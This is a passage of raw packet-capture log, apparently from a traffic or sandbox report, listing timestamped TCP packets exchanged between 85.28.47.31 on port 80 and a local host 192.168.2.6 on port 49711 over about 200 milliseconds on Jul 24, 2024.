                                                                                        Jul 24, 2024 07:14:17.711452007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711462975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711472034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711498976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711528063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711539984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711556911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711566925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711576939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711586952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711591005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711596966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711606979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.711607933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711647034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.711647034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.712508917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712519884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712528944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712539911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712548971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712558985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712568045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712570906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.712579966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712589025 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712590933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.712599993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.712609053 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.712625027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.712647915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.713485003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713495970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713505030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713515043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713525057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713534117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713538885 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713548899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713555098 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.713558912 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713570118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.713588953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.713619947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.713619947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.714379072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.714389086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.714453936 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.714483023 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.788868904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.788901091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.788912058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789010048 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789081097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789113045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789124012 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789164066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789164066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789383888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789401054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789441109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789470911 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789484024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789531946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789551973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789561987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789606094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789736032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789747000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789758921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789772034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.789788961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789818048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.789834023 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.790070057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.790134907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.792467117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.792527914 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.792540073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.792551041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.792594910 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.792710066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.792759895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.792764902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.792777061 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.792787075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.792814970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.792844057 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.793117046 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.793128967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.793139935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.793150902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.793169975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.793205023 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.793205976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.793490887 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.793502092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.793512106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.793549061 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.793576002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.797677994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.797734022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.797741890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.797744989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.797784090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.797785044 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.797919989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.797933102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.797976017 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.798006058 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.798072100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.798084021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.798130989 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.798856974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.798898935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.798908949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.798913956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.798958063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.798958063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799062967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799072981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799087048 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799098015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799117088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799149990 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799149990 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799371004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799427986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799516916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799527884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799539089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799555063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799566984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799573898 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799577951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799588919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799592018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799599886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.799607992 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.799645901 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.800113916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.800124884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.800137043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.800148964 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.800173998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.800199032 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.801346064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801413059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801424026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.801424980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801462889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.801462889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.801609993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801620960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801631927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801641941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801662922 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.801692009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.801858902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801918983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.801934958 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801947117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.801991940 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.802201986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802213907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802225113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802237988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802258015 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.802287102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.802474022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802484035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802503109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802512884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802525043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802526951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.802535057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802546024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.802546024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802558899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802570105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.802575111 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.802592993 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.802620888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.803119898 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803179026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.803191900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803203106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803212881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803224087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803236961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.803271055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.803271055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.803617954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803627968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803638935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803649902 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803659916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803673983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.803673983 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.803694963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.803723097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804124117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804136038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804147005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804157019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804168940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804179907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804191113 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804191113 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804194927 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804207087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804213047 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804218054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804229975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804230928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804250002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804272890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804912090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804923058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804939032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804949999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804960966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804968119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804971933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804982901 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.804987907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.804994106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.805005074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.805008888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.805015087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.805027962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.805048943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.879581928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.879647970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.879648924 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.879657984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.879693031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.879695892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.879704952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.879738092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.879978895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.879991055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880001068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880033970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.880045891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.880523920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880542994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880553007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880572081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.880589962 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.880738974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880748987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880759954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880770922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.880789995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.880804062 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883127928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883182049 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883217096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883228064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883265972 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883284092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883342981 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883389950 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883460045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883485079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883497000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883507967 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883524895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883542061 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883697033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883707047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883718014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883744001 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883764982 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.883954048 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883965969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883976936 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.883987904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.884005070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.884031057 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.888520002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.888576984 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.888596058 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.888607979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.888642073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.888653040 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.888788939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.888798952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.888808012 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.888818026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.888835907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.888850927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.889497042 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889547110 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.889555931 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889565945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889591932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.889604092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.889744043 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889754057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889765024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889775038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889784098 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.889794111 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.889822960 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890077114 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890088081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890104055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890114069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890124083 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890125036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890150070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890177011 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890366077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890376091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890415907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890425920 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890429020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890439987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890450001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890461922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890465975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890472889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:17.890487909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:17.890496969 CEST804971185.28.47.31192.168.2.6
